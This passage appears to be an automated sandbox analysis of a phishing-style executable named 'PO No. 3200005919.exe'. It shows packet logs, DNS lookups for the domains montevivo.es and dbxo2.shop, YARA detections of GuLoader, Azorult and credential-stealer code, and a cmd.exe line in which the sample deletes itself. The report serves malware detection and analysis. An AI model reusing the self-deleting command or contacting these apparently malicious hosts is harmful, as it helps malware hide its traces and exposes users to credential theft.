                            Nov 28, 2022 16:37:02.334062099 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334155083 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334222078 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334285021 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334330082 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334350109 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334397078 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334397078 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334414005 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334484100 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334547997 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334546089 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334610939 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334673882 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.334706068 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334706068 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334882021 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.334882021 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.384736061 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.384824038 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.384953022 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385019064 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385050058 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385051012 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385119915 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385164022 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385210991 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385349989 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385399103 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385436058 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385519028 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385656118 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385687113 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385814905 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.385854006 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.385967016 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386049032 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386059999 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386130095 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386153936 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386209011 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386260033 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386336088 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386370897 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386419058 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386428118 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386492014 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386526108 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386573076 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386614084 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386689901 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386735916 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386774063 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386790991 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386869907 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.386873960 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.386997938 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.387049913 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.436908960 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.436988115 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437089920 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437146902 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437201023 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437257051 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437258005 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437302113 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437319994 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437417984 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437484026 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437491894 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437580109 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437630892 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437697887 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437700033 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.437851906 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.437907934 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438007116 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438067913 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438128948 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438169003 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438250065 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438256025 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438327074 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438363075 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438453913 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438491106 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438545942 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438566923 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438613892 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438684940 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438750029 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438805103 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438841105 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.438896894 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.438963890 CET804982986.109.170.4192.168.11.20
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 28, 2022 16:37:02.006957054 CET5793653192.168.11.201.1.1.1
                            Nov 28, 2022 16:37:02.198887110 CET53579361.1.1.1192.168.11.20
                            Nov 28, 2022 16:37:02.549231052 CET6353853192.168.11.201.1.1.1
                            Nov 28, 2022 16:37:02.597363949 CET53635381.1.1.1192.168.11.20
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 28, 2022 16:37:02.006957054 CET192.168.11.201.1.1.10xc0b2Standard query (0)montevivo.esA (IP address)IN (0x0001)false
                            Nov 28, 2022 16:37:02.549231052 CET192.168.11.201.1.1.10x62fbStandard query (0)dbxo2.shopA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 28, 2022 16:37:02.198887110 CET1.1.1.1192.168.11.200xc0b2No error (0)montevivo.es86.109.170.4A (IP address)IN (0x0001)false
                            Nov 28, 2022 16:37:02.597363949 CET1.1.1.1192.168.11.200x62fbNo error (0)dbxo2.shop104.21.2.6A (IP address)IN (0x0001)false
                            Nov 28, 2022 16:37:02.597363949 CET1.1.1.1192.168.11.200x62fbNo error (0)dbxo2.shop172.67.128.117A (IP address)IN (0x0001)false
                            • montevivo.es
                            • dbxo2.shop

                            Click to jump to process

                            Target ID:1
                            Start time:16:36:12
                            Start date:28/11/2022
                            Path:C:\Users\user\Desktop\PO No. 3200005919.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\PO No. 3200005919.exe
                            Imagebase:0x400000
                            File size:373461 bytes
                            MD5 hash:9453CDCF8221341D06BAC47B8AB3AA19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:5
                            Start time:16:36:42
                            Start date:28/11/2022
                            Path:C:\Users\user\Desktop\PO No. 3200005919.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\PO No. 3200005919.exe
                            Imagebase:0x400000
                            File size:373461 bytes
                            MD5 hash:9453CDCF8221341D06BAC47B8AB3AA19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:6
                            Start time:16:37:16
                            Start date:28/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                            Imagebase:0x5f0000
                            File size:236544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:7
                            Start time:16:37:16
                            Start date:28/11/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6e2e30000
                            File size:875008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:8
                            Start time:16:37:17
                            Start date:28/11/2022
                            Path:C:\Windows\SysWOW64\timeout.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\timeout.exe 3
                            Imagebase:0x880000
                            File size:25088 bytes
                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            No disassembly